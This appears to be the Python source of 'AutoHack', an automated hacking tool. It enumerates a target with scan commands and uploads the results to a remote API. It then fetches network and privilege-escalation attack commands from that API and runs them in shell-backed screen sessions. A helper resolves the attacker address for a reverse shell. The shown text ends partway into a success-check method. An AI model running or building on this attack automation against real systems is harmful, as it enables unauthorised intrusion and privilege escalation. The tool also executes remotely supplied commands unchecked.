#!python
import os
import re
import site
import subprocess as sp
import time
import shlex
import argparse
import uuid

import requests
from glob import glob
from dataclasses import dataclass
from multiprocessing import Lock
from multiprocessing import Process
from multiprocessing import current_process
from subprocess import Popen, PIPE
from threading import Thread
from typing import List, Dict, Union, Callable, Any

import toml
from bs4 import BeautifulSoup


class Colors:
    """ANSI escape sequences used to colour and embolden terminal output."""

    # foreground colours
    BLUE = '\033[34m'
    CYAN = '\033[96m'
    GREEN = '\033[92m'
    MAGENTA = '\033[95m'
    RED = '\033[91m'

    # text attributes
    BOLD = '\033[1m'
    END = '\033[0m'  # resets all colours/attributes set above


class SuccessStatus:
    """String status values for exploitation attempts; each value equals its name."""

    # network exploit outcomes
    EXPLOIT_NETWORK_SUCCESSFUL = 'EXPLOIT_NETWORK_SUCCESSFUL'
    EXPLOIT_NETWORK_UNSUCCESSFUL = 'EXPLOIT_NETWORK_UNSUCCESSFUL'

    # OS exploit outcomes
    EXPLOIT_OS_SUCCESSFUL = 'EXPLOIT_OS_SUCCESSFUL'
    EXPLOIT_OS_UNSUCCESSFUL = 'EXPLOIT_OS_UNSUCCESSFUL'


class Utils:
    class AutoHackException(Exception):
        pass

    @staticmethod
    def make_directories(*args: str) -> None:
        """
        Makes a directory for each directory
        :param args:
        :return:
        """
        for directory in args:
            if os.path.isdir(directory):
                continue
            os.makedirs(directory)

    @staticmethod
    def clear_file(_file: str) -> None:
        """
        Clear file by writing an empty string into it
        :param _file:
        :return:
        """
        with open(_file, 'w') as f:
            f.write('')

    @staticmethod
    def print_time() -> None:
        current_time_in_seconds = int(time.time())
        print(f"{Colors.MAGENTA}{Colors.BOLD}CURRENT TIME{Colors.END}: {current_time_in_seconds}")

    @staticmethod
    def determine_output_file(
            command: str,
            options_associated_with_output_file: List[str]
    ) -> Union[str, None]:
        """
        Parses command for output file and returns...
            (1) the output file if determined
                        or
            (2) None, if output file can not be determined
        :param command:
        :param options_associated_with_output_file:
        :return:
        """
        fragments = shlex.split(command)
        filepath = None

        for index, fragment in enumerate(fragments):
            if fragment.lower() in options_associated_with_output_file:
                if index + 1 >= len(fragments):
                    continue

                filepath = fragments[index + 1]
                return filepath
        return filepath

    @staticmethod
    def should_run_command(command_output_file: str) -> bool:
        """
        Should run command if:
            (1) the output file is None
                            or
            (2) the command's output file doesn't exist
        :param command_output_file:
        :return: a boolean value
        """
        if command_output_file is None:
            return True

        return not os.path.isfile(command_output_file)

    @staticmethod
    def extract_matching_string(regex: str, text: str) -> Union[str, None]:
        """
        Extracts the string which matches regex within a text
        :param regex:
        :param text:
        :return:
        """
        match = re.search(regex, text.lower())
        if match:
            return match.string
        else:
            return None

    @staticmethod
    def alpha_to_int(text) -> Union[int, str]:
        """
        Casts alpha-numeric to an integer
        :param text:
        :return:
        """
        if text.isdigit():
            return int(text)
        return text

    @staticmethod
    def natural_keys(text: str) -> List[str]:
        """
        Split text into fragments so it can be naturally sorted.
        :param text:
        :return:
        """
        return [Utils.alpha_to_int(c) for c in re.split('(\\d+)', text)]

    @staticmethod
    def get_site_packages() -> List[str]:
        return site.getsitepackages()

    @staticmethod
    def get_lock():
        """
        Returns the processing lock
        :return:
        """
        return Lock()

    @staticmethod
    def process_safe_print(_str: str) -> None:
        """
        Locks process, prints, and releases process
        so that printing output appears in the correct order
        :param _str:
        :return:
        """
        process_lock = Utils.get_lock()
        process_lock.acquire()
        print(_str)
        process_lock.release()

    @staticmethod
    def get_chart(value, max_value, size=30, unit='seconds') -> str:
        """
        Renders chart based on input values

        :param value:
        :param max_value:
        :param size:
        :param unit:
        :return:
        """
        if value > max_value:
            value = max_value
        elif value < 0:
            value = 0

        scaled_value = int(value / max_value * size)
        tick_marks = '▯' * scaled_value
        non_tick_marks = ' ' * (size - scaled_value)
        chart = (f'|{Colors.GREEN}{Colors.BOLD}{tick_marks}{Colors.END}'
                 f'{Colors.CYAN}({value} {unit}){Colors.END}'
                 f'{non_tick_marks}|{Colors.CYAN}({max_value} {unit}){Colors.END}')
        return chart

    @staticmethod
    def get_attacker_address(interface='tun0') -> str | None:
        """
        Gets ip address of attacker. This is used for
        obtaining a reverse shell.

        By default, it uses the tun0 network interface since the attacker
        is likely connected to the target through a vpn.

        :param interface:
        :return:
        """
        try:
            result = sp.check_output(
                ['ip', '-4', 'addr', 'show', interface],
                stderr=sp.STDOUT
            )
            result = result.decode().splitlines()
            ipaddr = [line.split()[1].split('/')[0] for line in result if "inet" in line]
            return ipaddr[0]

        except (Exception,):
            return None


@dataclass
class ProcessReference:
    """
    Book-keeping record for one spawned command process: what it runs, when
    it must be killed, how many restarts remain and every pid it has had.
    """
    target: Callable          # function executed in the child process
    args: List[Any]           # positional args for target; args[0] is the command
    kill_after_time: int      # unix time (seconds) at which the process times out
    process_object: Process   # the current child process
    retry_max: int            # remaining restarts allowed after a timeout
    command_pids: List[str]   # pid history for this command, oldest first

    def has_timed_out(self) -> bool:
        """True once the current unix time has reached ``kill_after_time``."""
        now = int(time.time())
        return not now < self.kill_after_time

    @property
    def should_retry(self):
        """True while at least one restart is still allowed."""
        return 0 < self.retry_max

    @property
    def command(self):
        """The first recorded argument (the command string)."""
        try:
            first_argument = self.args[0]
        except IndexError:
            raise Utils.AutoHackException(
                f'Process {self.process_object.pid} Does Not Have Any Arguments Recorded'
            )
        return first_argument

    def decrement_retry_max(self):
        """Consumes one restart."""
        self.retry_max = self.retry_max - 1

    def append_pid(self, pid: str):
        """
        Records another pid for this command (useful when debugging restarts).
        :param pid:
        :return:
        """
        pid_history = self.command_pids
        pid_history.append(pid)


class ProcessManager:
    """
    Supervises the command processes spawned by AutoHack.

    A background "heart beat" thread wakes every ``time_between_heart_beats``
    seconds. On each beat it:
      * terminates processes past their deadline, restarting them while
        retries remain;
      * prints a status report;
      * forgets processes once none of them are running.
    """

    def __init__(
            self,
            verbose: bool,
            time_between_heart_beats: int,
    ):
        import threading  # local import: only the lock type is needed here

        self.processes: List[ProcessReference] = []
        self.verbose = verbose
        self.time_between_heart_beats = time_between_heart_beats
        # Guards structural changes to ``self.processes``. The main thread
        # appends while the heart beat thread prunes, and an unguarded reset
        # could drop a reference appended in between.
        self._processes_lock = threading.Lock()
        self.heart_beat_process = Thread(
            target=self.heart_beat,
        )

    def wait_until_pending_processes_have_completed(self):
        """
        Blocks until the heart beat has pruned every tracked process, so we
        don't move on to the next step while earlier commands still run.
        :return: None
        """
        half_time_between_heart_beats = self.time_between_heart_beats / 2
        while self.processes:
            time.sleep(half_time_between_heart_beats)

        print('\nPending Processes Have Completed. Moving To Next Step\n')

    def append_process(self, process: ProcessReference) -> None:
        """Starts tracking ``process``."""
        with self._processes_lock:
            self.processes.append(process)

    def print_active_processes_data(self, active_process: List[ProcessReference]) -> None:
        """
        Prints, as a single message, the pid, a time-until-timeout chart and
        (when verbose) the command of every process in ``active_process``.
        """
        current_time = int(time.time())

        message = f'\n{Colors.MAGENTA}{Colors.BOLD}COMMANDS STILL RUNNING [at {current_time}]:{Colors.END}\n'
        for process in active_process:
            seconds_until_timeout = int(process.kill_after_time - current_time)

            message += f'\t{Colors.CYAN}{Colors.BOLD}PID:{Colors.END} {process.process_object.pid}\n'
            chart = Utils.get_chart(
                value=seconds_until_timeout,
                max_value=AutoHack.command_timeout
            )
            message += f'\t{Colors.CYAN}{Colors.BOLD}SECONDS UNTIL TIMEOUT:{Colors.END} {chart}\n'

            if self.verbose:
                message += f'\t{Colors.CYAN}{Colors.BOLD}COMMAND CALLED:{Colors.END} {process.command}\n'

            # add spaces between each process message
            message += '\n'

        Utils.process_safe_print(message)

    @staticmethod
    def retry_process(process: ProcessReference):
        """
        * Creates a new process using the preexisting target and args.
        * Updates attributes of process reference (process object, pid
          history, deadline, remaining retries).

        :param process:
        :return:
        """

        # create new process using preexisting
        pr = Process(target=process.target, args=process.args)
        pr.start()

        # update process reference attributes
        process.process_object = pr
        process.append_pid(str(pr.pid))
        process.kill_after_time = int(time.time()) + AutoHack.command_timeout
        process.decrement_retry_max()

    def terminate_all_active_processes(self, show_message: bool = True) -> None:
        """
        Terminates every tracked process that is alive and has not timed out.
        Timed-out processes are skipped; the heart beat loop terminates those
        itself before calling this.
        """
        for process in self.processes:

            if not process.process_object.is_alive():
                continue

            if process.has_timed_out():
                continue

            process.process_object.terminate()

            if not show_message:
                continue

            message = (f'\n{Colors.RED}{Colors.BOLD}KILLING PROCESS, PROGRAM ENDING: '
                       f'PID:{process.process_object.pid}{Colors.END}')
            Utils.process_safe_print(message)

    def heart_beat(self) -> None:
        """
        Background loop; see the class docstring. Exits, after terminating
        everything still running, once ``AutoHack.should_kill_heart_beat``
        is set.
        """
        while True:
            time.sleep(self.time_between_heart_beats)

            # Scan a snapshot. References appended while we work are picked
            # up on the next beat instead of being lost by the reset below.
            with self._processes_lock:
                examined = list(self.processes)

            active_processes = []
            for process in examined:

                # skip non-active processes
                if not process.process_object.is_alive():
                    continue

                if process.has_timed_out():
                    process.process_object.terminate()
                    message = (f'\n{Colors.RED}{Colors.BOLD}KILLING PROCESS DUE TO TIMEOUT: '
                               f'PID:{process.process_object.pid}{Colors.END}')
                    Utils.process_safe_print(message)

                    if not process.should_retry:
                        continue

                    self.retry_process(process)
                    command_pids = '->'.join(process.command_pids)
                    message = (
                        f'{Colors.MAGENTA}{Colors.BOLD}COMMAND RESTARTED:{Colors.END} '
                        f'{Colors.CYAN}{Colors.BOLD}COMMAND PIDS:{Colors.END}'
                        f'{Colors.GREEN}{Colors.BOLD}{command_pids}{Colors.END}\n'
                    )
                    Utils.process_safe_print(message)

                active_processes.append(process)

            if AutoHack.should_kill_heart_beat:
                self.terminate_all_active_processes()
                break

            if active_processes:
                self.print_active_processes_data(active_processes)
            else:
                # None of the examined processes is running. Forget them, but
                # keep anything appended after the snapshot. Only this thread
                # removes entries, so the examined ones are exactly the first
                # len(examined).
                with self._processes_lock:
                    self.processes = self.processes[len(examined):]

    def run(self):
        """Starts the heart beat thread."""
        self.heart_beat_process.start()


class AutoHack:
    should_kill_heart_beat = False
    command_timeout = 0
    api_source = os.getenv('AUTOHACK_API_SOURCE') or 'https://api.autohack.com'
    api_key = os.getenv('AUTOHACK_API_KEY') or 'FREE'

    def __init__(
            self, ip_address, attacker_ip_address, output_directory=None, config_directory=None,
            port_scan_type=None, nmap_extra=None, ports=None,
            use_processes=None, verbose=None, command_timeout=None,
            heart_beat_time=None, retry_max=None, professional=None
    ) -> None:
        """
        Loads the TOML configuration, creates the output directory tree for
        the target and initialises per-run state.

        :param ip_address: address of the target machine
        :param attacker_ip_address: address of this machine; when falsy,
            ``upload_enumeration_files`` falls back to the tun0 address
        :param output_directory: results root; defaults to
            ``<cwd>/results/<ip_address>``
        :param config_directory: AutoHack config directory; located by
            ``get_config`` when not given
        :param port_scan_type: stored on the instance
        :param nmap_extra: extra nmap arguments, substituted into command templates
        :param ports: stored on the instance
        :param use_processes: run scan commands in child processes supervised
            by a ``ProcessManager`` heart beat thread
        :param verbose: print extra diagnostic output
        :param command_timeout: seconds before a child command is killed
        :param heart_beat_time: seconds between heart beats
        :param retry_max: how many times a timed-out command is restarted
        :param professional: stored on the instance
        :raises Utils.AutoHackException: if the config directory or one of the
            four required TOML files cannot be found
        """
        AutoHack.command_timeout = command_timeout
        self.process_lock = Utils.get_lock()
        self.target_address = ip_address
        self.attacker_address = attacker_ip_address
        self.port_scan_type = port_scan_type
        self.nmap_extra = nmap_extra
        self.ports = ports
        self.current_working_directory = os.getcwd()
        self.use_processes = use_processes
        self.verbose = verbose
        self.retry_max = retry_max
        self.professional = professional
        self.process_manager = ProcessManager(
            verbose=verbose,
            time_between_heart_beats=heart_beat_time,
        )

        output_directory = output_directory or os.path.join(
            self.current_working_directory,
            'results', self.target_address
        )
        config_directory = self.get_config(config_directory)
        port_scan_config_file = os.path.join(config_directory, 'port-scans.toml')
        services_scan_config_file = os.path.join(config_directory, 'service-scans.toml')
        universal_pattern_config_file = os.path.join(config_directory, 'universal-patterns.toml')
        os_discovery_config_file = os.path.join(config_directory, 'os-discovery.toml')

        required_config_files = (
            (port_scan_config_file,
             f'Can Not Find Port Scan Config File inside: {config_directory} Directory'),
            (services_scan_config_file,
             f'Can Not Find Services Scan Config File: {config_directory} Directory'),
            (universal_pattern_config_file,
             f'Can Not Find Universal Pattern Config File: {config_directory} Directory'),
            (os_discovery_config_file,
             f'Can Not Find Os Discovery Config File: {config_directory} Directory'),
        )
        for config_file, missing_message in required_config_files:
            if not os.path.isfile(config_file):
                raise Utils.AutoHackException(missing_message)

        self.port_scan_config = toml.load(port_scan_config_file)
        self.services_scan_config = toml.load(services_scan_config_file)
        self.universal_patterns = list(toml.load(universal_pattern_config_file).values())
        self.os_discovery_config = toml.load(os_discovery_config_file)

        self.scan_directory = os.path.join(output_directory, 'scans')
        xml_directory = os.path.join(self.scan_directory, 'xml')
        log_directory = os.path.join(self.scan_directory, 'logs')
        self.exploit_directory = os.path.join(output_directory, 'exploit')
        self.exploit_commands_attempted_directory = os.path.join(self.exploit_directory, 'commands_attempted')
        self.priv_directory = os.path.join(output_directory, 'priv')
        loot_directory = os.path.join(output_directory, 'loot')
        Utils.make_directories(
            self.scan_directory, xml_directory, log_directory,
            self.exploit_directory, self.priv_directory, loot_directory,
            self.exploit_commands_attempted_directory
        )

        self.detected_services = set()
        self.pattern_matches = dict()
        self.exploit_scans = set()
        self.commands_run_log = os.path.join(log_directory, 'commands.log')
        self.detected_services_log = os.path.join(log_directory, 'detected_services.log')
        self.exploit_steps_log = os.path.join(log_directory, 'exploit_steps.log')
        self.patterns_detected_log = os.path.join(log_directory, 'patterns.log')
        self.session_id: str | None = None
        self.spearhead_index_unique_id: str | None = None
        self.expected_command_answers_to_verify_root_access: dict = {}
        self.success_status = SuccessStatus.EXPLOIT_NETWORK_UNSUCCESSFUL
        Utils.clear_file(self.exploit_steps_log)

        # Start the heart beat only after set-up has succeeded. It runs in a
        # non-daemon thread that loops until ``should_kill_heart_beat`` is set,
        # so starting it earlier would keep the interpreter alive forever if
        # any of the checks above raised.
        if use_processes:
            self.process_manager.run()

    def get_config(self, config_directory: str):
        """
        The config directory is needed for enumeration.
        This method checks for the config directory in all the
        expected places. If it cannot be found, it raises an exception

        :param config_directory:
        :return:
        """
        # use user-specified AutoHack config directory
        if config_directory:
            return config_directory

        # define <current-working-directory>/autohack_config
        local_config_directory = os.path.join(
            self.current_working_directory, 'autohack_config'
        )

        # define ~/.config/autohack_config
        home_directory = os.path.expanduser("~")
        global_config_directory = os.path.join(
            home_directory, '.config', 'autohack_config'
        )

        # define <possible site-packages>/autohack_config
        site_packages = Utils.get_site_packages()
        site_packages_autohack_directories = [
            f'{site_package_directory}/autohack_config' for site_package_directory in site_packages
        ]

        possible_config_directories_locations = [
                                                    local_config_directory,
                                                    global_config_directory
                                                ] + site_packages_autohack_directories

        for prospective_directory in possible_config_directories_locations:
            if self.verbose:
                print(f'{Colors.GREEN}Looking For AutoHack Config In: {prospective_directory}{Colors.END}')

            if os.path.exists(prospective_directory):
                if self.verbose:
                    print(f'{Colors.GREEN}Found AutoHack Config In: {prospective_directory}{Colors.END}\n\n')
                return prospective_directory

        # raise exception when config directory couldn't be found
        raise Utils.AutoHackException('Can Not Find Config Directory')

    def print(self, _str: str) -> None:
        """
        Locks process, prints, and releases process
        so that printing output appears in the correct order
        :param _str:
        :return:
        """
        self.process_lock.acquire()
        print(_str)
        self.process_lock.release()

    def process_print(self, _str: str) -> None:
        """
        Prints while prepending the process id
        so it's more obvious where message came from
        :param _str:
        :return:
        """
        if self.use_processes:
            process_id = current_process().pid
            _str = f"{Colors.CYAN}{Colors.BOLD}Process {process_id}:{Colors.END} {_str}"
        self.print(_str)

    def command_has_been_run(self, command) -> bool:
        try:
            f = open(self.commands_run_log, "r")
            all_commands_run = f.read()
            return command in all_commands_run
        except FileNotFoundError:
            return False

    def log_command(self, command: str) -> None:
        """
        Writes command to a log file
        :param command:
        :return:
        """
        process_id = current_process().pid
        command = f"[*] (Process {process_id}) {command}\n\n"
        self.process_lock.acquire()
        with open(self.commands_run_log, 'a') as f:
            f.write(command)
        self.process_lock.release()

    def log_detected_services(self) -> None:
        """
        Rewrites the detected-services log with every entry of
        ``self.detected_services``, one per line, in natural sort order.
        :return: None
        """
        detected_services_list = sorted(self.detected_services, key=Utils.natural_keys)

        # Take the lock *before* opening: 'w' truncates the file, which must
        # not happen while another worker is writing it. ``with`` also
        # guarantees the lock is released if a write fails.
        with self.process_lock, open(self.detected_services_log, 'w') as f:
            f.writelines(f"{detected_service}\n" for detected_service in detected_services_list)

    def log_exploit_steps(self, exploit_scans: List[Dict], service_scan_data: Dict) -> None:
        """
        Writes exploit scans to a log file
        :param exploit_scans:
        :param service_scan_data:
        :return:
        """
        with open(self.exploit_steps_log, 'a') as f:
            self.process_lock.acquire()
            for sub_scan in exploit_scans:
                message = f"[*] {sub_scan['description']}\n"
                wrote_command = False

                for command in sub_scan['commands']:
                    command = command.format(**service_scan_data)
                    if command in self.exploit_scans:
                        continue
                    wrote_command = True
                    self.exploit_scans.add(command)
                    message += f"\t{command}\n"
                if wrote_command:
                    f.write(f"{message}\n\n")
            self.process_lock.release()

    def record_pattern_matches(self, output_file: str, patterns: List[dict], service_data: dict) -> None:
        """
        Checks output file for certain regex patterns
        and then saves pattern description for future analysis.

        :param output_file:
        :param patterns:
        :param service_data:
        :return:
        """
        if 'port' in service_data:
            # since port scans don't specify a port, don't look at universal
            # patterns for port scans
            patterns_to_search = patterns + self.universal_patterns
        else:
            patterns_to_search = patterns

        if len(patterns_to_search) == 0:
            return

        with open(output_file, 'r') as f:
            for line in f:
                for pattern in patterns_to_search:
                    description = pattern['description']
                    pattern_regex = pattern['pattern'].lower()
                    match = Utils.extract_matching_string(pattern_regex, line)
                    if match:
                        description = description.format(**service_data, match=match)
                        if output_file in self.pattern_matches:
                            self.pattern_matches[output_file].add(description)
                        else:
                            self.pattern_matches[output_file] = {description}
        self.log_recorded_patterns()

    def log_recorded_patterns(self) -> None:
        """
        Records patterns which were saved
        :return:
        """
        if len(self.pattern_matches) == 0:
            return

        pattern_description_shown = set()

        self.process_lock.acquire()
        with open(self.patterns_detected_log, 'w') as f:
            for output_file in self.pattern_matches:
                unrepeated_pattern_present = False
                message = f"[*] Pattern/s detected in: '{output_file}'\n"
                for description in self.pattern_matches[output_file]:
                    if description in pattern_description_shown:
                        continue
                    pattern_description_shown.add(description)
                    message += f"\t[-] {description}\n"
                    unrepeated_pattern_present = True
                message += "\n"

                if unrepeated_pattern_present:
                    f.write(message)
        self.process_lock.release()

    def run_command(self, command: str, should_log=True) -> None:
        """
        Executes a command
        :param command:
        :param should_log:
        :return:
        """
        if should_log:
            self.log_command(command)

        process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
        _, __ = process.communicate()

    def record_process_reference(self, target, arguments, pr):
        """
        Registers a freshly started process with the process manager so the
        heart beat can time it out and restart it.

        :param target: the function the process runs
        :param arguments: the arguments that function is called with
        :param pr: the started process object
        :return: None
        """
        reference = ProcessReference(
            target=target,
            args=arguments,
            kill_after_time=int(time.time()) + self.command_timeout,
            process_object=pr,
            retry_max=self.retry_max,
            command_pids=[str(pr.pid)],
        )
        self.process_manager.append_process(reference)

    def wait_for_all_processes(self):
        """
        This blocks execution until all the spawned processes and threads have completed
        :return:
        """
        if not self.use_processes:
            # if processes are not being used,
            # this can be skipped
            return

        for pr in self.process_manager.processes:
            pr.process_object.join()

        # let heart beat thread complete after process
        self.process_manager.heart_beat_process.join()
        print('\n\n')
        Utils.print_time()

    def execute_secondary_enumerate_command(
            self, command: str,
            service_data: dict,
            patterns: List[dict]
    ) -> None:
        """
        Executes command for secondary enumeration
        on text-based file outputs

        :param command:
        :param service_data:
        :param patterns:
        :return:
        """
        command = command.format(**service_data)
        if self.command_has_been_run(command):
            return

        text_file_related_parameters = ['-on', 'tee', '-o', '--simple-report']
        output_file = Utils.determine_output_file(command, text_file_related_parameters)
        if Utils.should_run_command(output_file):
            time_before_command = int(time.time())
            command_printed = (
                f"SECONDARY ENUMERATE: [at {time_before_command}]\n"
                f"\t{Colors.GREEN}{command}{Colors.END}"
            )
            self.process_print(command_printed)
            self.run_command(command)
            time_after_command = int(time.time())
            self.process_print(
                f"{Colors.MAGENTA}{Colors.BOLD}Command Completed{Colors.END} "
                f"[at {time_after_command}]\n"
            )

        if output_file is None:
            return

        self.record_pattern_matches(output_file, patterns, service_data)

    def execute_primary_enumerate_command(
            self, command: str,
            service_data: dict,
    ) -> None:
        """
        Executes command for primary enumeration
        on xml-based file outputs

        :param command:
        :param service_data:
        :return:
        """
        command = command.format(**service_data)
        if self.command_has_been_run(command):
            return

        xml_file_related_parameters = ['-ox']
        output_file = Utils.determine_output_file(command, xml_file_related_parameters)
        if Utils.should_run_command(output_file):
            time_before_command = int(time.time())
            command_printed = (
                f"{Colors.BLUE}{Colors.BOLD}PRIMARY ENUMERATE:{Colors.END} "
                f"[at {time_before_command}]\n\t{Colors.GREEN}{command}{Colors.END}"
            )
            self.process_print(command_printed)
            self.run_command(command)
            time_after_command = int(time.time())
            self.process_print(
                f"{Colors.MAGENTA}{Colors.BOLD}Primary Command Completed{Colors.END} "
                f"[at {time_after_command}]\n"
            )

        if output_file is None:
            return

        self.secondary_enumerate(output_file)

    def secondary_enumerate(self, xml_output_file: str) -> None:
        """
        Does secondary enumeration based on sub-scans in
        the service-scans.toml in config folder and xml-output files
        :param xml_output_file::
        :return:
        """
        if xml_output_file is None:
            return

        infile = open(xml_output_file, "r")
        contents = infile.read()
        soup = BeautifulSoup(contents, 'xml')
        ports = soup.find_all('port')

        for port in ports:
            state = port.find('state')
            if state['state'] == 'closed':
                continue

            service = port.find('service')
            if service is None:
                continue

            service_scan_data = {
                'nmap_extra': self.nmap_extra,
                'scandir': self.scan_directory,
                'target_address': self.target_address,
                'port': port['portid'],
                'protocol': port['protocol'],
                'name': service['name'],
                'username_wordlist': self.services_scan_config['username_wordlist'],
                'password_wordlist': self.services_scan_config['password_wordlist'],
                'secure': True if 'ssl' in service or 'tls' in service else False,
                'scheme': 'https' if 'https' in service or 'ssl' in service or 'tls' in service else 'http'
            }

            self.detected_services.add(
                f"[*] {port['portid']}/{port['protocol']}: {service['name']}    ({state['state']})"
            )
            for service_name, scan in self.services_scan_config.items():
                if type(scan) is not dict:
                    continue
                scan_regex_combined = "(" + ")|(".join(scan['service-names']) + ")"
                match = Utils.extract_matching_string(scan_regex_combined, service['name'])
                if match is None:
                    continue

                if 'exploit' in scan:
                    self.log_exploit_steps(scan['exploit'], service_scan_data)

                if 'scan' not in scan:
                    continue

                for sub_scan in scan['scan']:
                    command = sub_scan['command']
                    patterns = sub_scan.get('pattern', [])
                    if self.use_processes:
                        target = self.execute_secondary_enumerate_command
                        arguments = (command, service_scan_data, patterns)

                        pr = Process(target=target, args=arguments)
                        pr.start()

                        self.record_process_reference(
                            target=target, arguments=arguments, pr=pr)
                    else:
                        self.execute_secondary_enumerate_command(
                            command, service_scan_data, patterns
                        )

            self.log_detected_services()

    def upload_enumeration_files(self):
        """
        Uploads the enumeration results and stores the ``session_id`` the API
        returns on ``self.session_id``.

        The results are the nmap XML files under ``<scandir>/xml`` plus the
        text files in ``<scandir>``. Files are de-duplicated by name without
        extension, and the XML files are considered first.

        :raises Utils.AutoHackException: if no attacker address was given and
            none can be read from the default (tun0) interface
        """
        xml_file_pattern = glob(f'{self.scan_directory}/xml/*.xml')
        text_file_pattern = glob(f'{self.scan_directory}/*.txt')
        files_to_upload = {}
        files_uploaded_without_extensions = set()

        for file_path in xml_file_pattern + text_file_pattern:
            file_name_with_extension = os.path.basename(file_path)
            file_name_without_extension = os.path.splitext(file_name_with_extension)[0]

            if file_name_without_extension in files_uploaded_without_extensions:
                continue

            files_uploaded_without_extensions.add(file_name_without_extension)
            # read inside ``with`` so no file handles are leaked
            with open(file_path, 'rb') as f:
                files_to_upload[file_name_with_extension] = f.read()

        url = f'{self.api_source}/analyze-enumerate-results'
        # Resolve the address once, so the value validated here is the value
        # sent (a second lookup could differ or fail).
        attacker_address = self.attacker_address or Utils.get_attacker_address()
        if attacker_address is None:
            raise Utils.AutoHackException('Attacker Address Must Be Defined')

        headers = {
            'API_KEY': self.api_key,
            'target_address': self.target_address,
            'attacker_address': attacker_address,
            'scandir': self.scan_directory,
        }
        response = requests.post(url, files=files_to_upload, headers=headers)
        response_data = response.json()
        self.session_id = response_data['session_id']

    @staticmethod
    def get_screen_log_file(unique_screen_name: str):
        return f"/tmp/log_{unique_screen_name}.txt"

    def get_best_attack(self) -> dict:
        """
        Ask the API for the current best network attack of this session.

        :return: the decoded JSON body returned by ``/get-best-attack``.
        """
        auth_headers = {'API_KEY': self.api_key, 'session_id': self.session_id}
        endpoint = f'{self.api_source}/get-best-attack'
        return requests.post(endpoint, headers=auth_headers).json()

    def get_best_os_attack(self) -> dict:
        """
        Ask the API for the current best OS (privilege-escalation) attack
        of this session.

        :return: the decoded JSON body returned by ``/get-best-os-attack``.
        """
        auth_headers = {'API_KEY': self.api_key, 'session_id': self.session_id}
        endpoint = f'{self.api_source}/get-best-os-attack'
        return requests.post(endpoint, headers=auth_headers).json()

    def kill_preexisting_screens(self):
        """
        Kills all preexisting screens so they will
        not interfere with new screens
        :return:
        """
        command = 'pkill screen'
        self.run_command(command, False)

    def execute_attack(self, attack: dict):
        """
        Run every command of an attack in its own detached ``screen`` session.

        Running ``screen`` processes are killed first. Then, for each command:
          * its text is written to
            ``<exploit_commands_attempted_directory>/<uuid>.txt``
          * ``screen -dmS <uuid> -L -Logfile <log> bash -c "$(cat <file>)"``
            is launched, where ``<log>`` comes from ``get_screen_log_file``
          * if ``command_should_block[index]`` is truthy, execution waits
            until that session's screen process has exited
          * the command file is removed, even if a step above raised

        The session name of the command at ``spearhead_index`` is stored in
        ``self.spearhead_index_unique_id``.

        :param attack: API response; ``attack['attack_commands']`` must hold
            ``command_group``, ``vulnerability_name`` and a ``meta`` mapping
            with ``command_should_block`` (indexed per command) and
            ``spearhead_index``.
        """
        attack_commands = attack['attack_commands']
        commands = attack_commands['command_group']
        is_blocking = attack_commands['meta']['command_should_block']
        vul_name = attack_commands['vulnerability_name'].strip()
        spearhead_index = attack_commands['meta']['spearhead_index']

        print(f'\n{Colors.CYAN}RUNNING ATTACK COMMANDS FOR:{Colors.END} {vul_name}:\n')

        # stop the preexisting attack
        self.kill_preexisting_screens()

        for index, command in enumerate(commands):
            unique_screen_name = str(uuid.uuid4())
            if spearhead_index == index:
                self.spearhead_index_unique_id = unique_screen_name

            command_file_path = os.path.join(
                self.exploit_commands_attempted_directory,
                f'{unique_screen_name}.txt'
            )
            with open(command_file_path, "w") as file:
                file.write(command)

            try:
                log_file_path = self.get_screen_log_file(unique_screen_name)
                screen_command = (
                    f'screen -dmS {unique_screen_name} '
                    f'-L -Logfile "{log_file_path}" '
                    f'bash -c "$(cat {command_file_path})"'
                )

                time_before_command = int(time.time())
                command_printed = (
                    f"\tEXPLOIT COMMAND-{index} [at {time_before_command}]\n"
                    f"\t\t{Colors.GREEN}{command}{Colors.END}\n"
                )
                print(command_printed)

                p = Process(target=self.run_command, args=(screen_command, False))
                p.start()
                p.join()

                if is_blocking[index]:
                    # Wait for the screen session to finish.
                    # The blocking command is itself run through a shell (as the
                    # `$(...)` substitution requires), and that shell's command
                    # line contains the pgrep pattern. Wrapping the first
                    # character in a regex bracket expression lets pgrep still
                    # match the screen process without matching that shell, which
                    # could otherwise make `tail --pid` wait on itself forever.
                    # `-o` yields a single PID; `&&` skips the wait when the
                    # session has already exited and pgrep finds nothing.
                    pid_pattern = f'[{unique_screen_name[0]}]{unique_screen_name[1:]}'
                    blocking_command = (
                        f"pid=$(pgrep -o -f '{pid_pattern}') && "
                        f'tail --pid="$pid" -f /dev/null'
                    )
                    self.run_command(blocking_command, False)
            finally:
                # remove command file to clean up directory
                os.remove(command_file_path)

    def execute_os_attack(self, attack: dict):
        """
        Type an OS attack's commands into the spearhead screen session.

        ``attack['exploit_commands']`` holds two parallel lists, ``commands``
        and ``keys`` (both default to empty). Every command is written to a
        scratch file and echoed to the console. Only commands whose key is
        ``'spearhead'`` are sent (``screen -X stuff``) to the session
        ``self.spearhead_index_unique_id``, each followed by a half-second
        pause. A command without a matching key raises IndexError.
        """
        vul_name = attack['vulnerability_name'].strip()
        exploit_commands = attack['exploit_commands']
        commands = exploit_commands.get('commands', [])
        command_keys = exploit_commands.get('keys', [])
        pause_seconds = .5
        scratch_file_path = '/tmp/execute_os_path_tmp_file.txt'

        print(f'{Colors.CYAN}RUNNING OS ATTACK COMMANDS FOR:{Colors.END} {vul_name}:\n')

        for position, command in enumerate(commands):
            key = command_keys[position]

            with open(scratch_file_path, "w") as scratch_file:
                scratch_file.write(command)

            started_at = int(time.time())
            print(
                f"\tOS EXPLOIT COMMAND-{position} [at {started_at}]\n"
                f"\t\t{Colors.GREEN}{command}{Colors.END}\n"
            )

            if key != 'spearhead':
                continue

            self.run_command(
                f'screen -S {self.spearhead_index_unique_id} -X stuff "$(cat {scratch_file_path})\n"',
                False,
            )
            # give the stuffed command a moment to run
            time.sleep(pause_seconds)

    def attack_is_successful(self, delay_seconds: int = 10) -> bool:
        """
        Ask the API whether the last attack succeeded, based on what the
        spearhead screen session currently shows.

        * sleeps ``delay_seconds`` so the attack has time to run
        * dumps the spearhead screen to
          ``<exploit_directory>/<spearhead session>.txt`` via ``hardcopy``
        * posts the dump (as a JSON string) to ``/verify-best-attack-success``

        :param delay_seconds: seconds to wait before capturing the screen.
        :return: the ``is_successful`` field of the API response.
        """
        message = f"\t{Colors.MAGENTA}VERIFYING ATTACK SUCCESS{Colors.END} [at {int(time.time())}]"
        print(message)

